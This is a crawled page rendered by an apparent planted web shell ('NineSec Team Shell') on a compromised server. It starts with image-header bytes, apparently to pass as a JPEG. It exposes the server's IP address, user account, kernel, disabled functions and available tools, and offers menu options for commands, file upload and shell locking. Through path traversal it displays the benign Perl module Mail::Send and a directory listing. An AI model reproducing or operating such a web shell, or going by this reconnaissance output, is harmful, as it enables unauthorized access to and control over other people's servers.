�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.218
Web Server : Apache
System : Linux bob 6.17.4-2-pve #1 SMP PREEMPT_DYNAMIC PMX 6.17.4-2 (2025-12-19T07:49Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /media/../usr/share/javascript/../menu/../php/../python3/../gitweb/../gitweb/../perl5/Mail/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //media/../usr/share/javascript/../menu/../php/../python3/../gitweb/../gitweb/../perl5/Mail/Send.pm
# Copyrights 1995-2019 by [Mark Overmeer <markov@cpan.org>].
#  For other contributors see ChangeLog.
# See the manual pages for details on the licensing terms.
# Pod stripped from pm file by OODoc 2.02.
# This code is part of the bundle MailTools.  Meta-POD processed with
# OODoc into POD and HTML manual-pages.  See README.md for Copyright.
# Licensed under the same terms as Perl itself.

package Mail::Send;
use vars '$VERSION';
$VERSION = '2.21';


use strict;

use Mail::Mailer ();

sub Version { our $VERSION }

#------------------

sub new(@)
{   my ($class, %attr) = @_;
    my $self = bless {}, $class;

    while(my($key, $value) = each %attr)
    {	$key = lc $key;
        $self->$key($value);
    }

    $self;
}

#---------------

sub set($@)
{   my ($self, $hdr, @values) = @_;
    $self->{$hdr} = [ @values ] if @values;
    @{$self->{$hdr} || []};	# return new (or original) values
}


sub add($@)
{   my ($self, $hdr, @values) = @_;
    push @{$self->{$hdr}}, @values;
}


sub delete($)
{   my($self, $hdr) = @_;
    delete $self->{$hdr};
}


sub to		{ my $self=shift; $self->set('To', @_); }
sub cc		{ my $self=shift; $self->set('Cc', @_); }
sub bcc		{ my $self=shift; $self->set('Bcc', @_); }
sub subject	{ my $self=shift; $self->set('Subject', join (' ', @_)); }

#---------------

sub open(@)
{   my $self = shift;
    Mail::Mailer->new(@_)->open($self);
}

1;

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
October 23 2023 6:31:02
root
0755
AuthenticationResults
--
March 29 2022 10:48:20
root
0755
DKIM
--
March 29 2022 10:48:21
root
0755
Field
--
March 29 2022 10:40:48
root
0755
Mailer
--
March 29 2022 10:40:48
root
0755
SPF
--
March 29 2022 10:48:22
root
0755
SpamAssassin
--
October 23 2023 6:31:02
root
0755
Address.pm
6.844 KB
May 21 2019 4:26:37
root
0644
Address.pod
4.074 KB
May 21 2019 4:26:37
root
0644
AuthenticationResults.pm
1.674 KB
January 08 2020 4:38:14
root
0644
Cap.pm
6.424 KB
May 21 2019 4:26:37
root
0644
Cap.pod
3.778 KB
May 21 2019 4:26:37
root
0644
DKIM.pm
3.008 KB
February 08 2020 7:04:46
root
0644
Field.pm
4.938 KB
May 21 2019 4:26:37
root
0644
Field.pod
4.912 KB
May 21 2019 4:26:37
root
0644
Filter.pm
1.439 KB
May 21 2019 4:26:37
root
0644
Filter.pod
2.818 KB
May 21 2019 4:26:37
root
0644
Header.pm
13.821 KB
May 21 2019 4:26:37
root
0644
Header.pod
7.762 KB
May 21 2019 4:26:37
root
0644
Internet.pm
12.265 KB
July 25 2019 5:13:36
root
0644
Internet.pod
10.237 KB
May 21 2019 4:26:37
root
0644
Mailer.pm
4.941 KB
July 25 2019 5:13:36
root
0644
Mailer.pod
4.099 KB
May 21 2019 4:26:37
root
0644
SPF.pm
2.313 KB
June 08 2015 1:12:22
root
0644
Send.pm
1.352 KB
May 21 2019 4:26:37
root
0644
Send.pod
3.173 KB
May 21 2019 4:26:37
root
0644
Sendmail.pm
32.644 KB
September 18 2017 10:06:33
root
0644
SpamAssassin.pm
69.601 KB
March 24 2023 5:36:49
root
0644
Util.pm
3.359 KB
May 21 2019 4:26:37
root
0644
Util.pod
3.089 KB
May 21 2019 4:26:37
root
0644

NineSec Team - 2022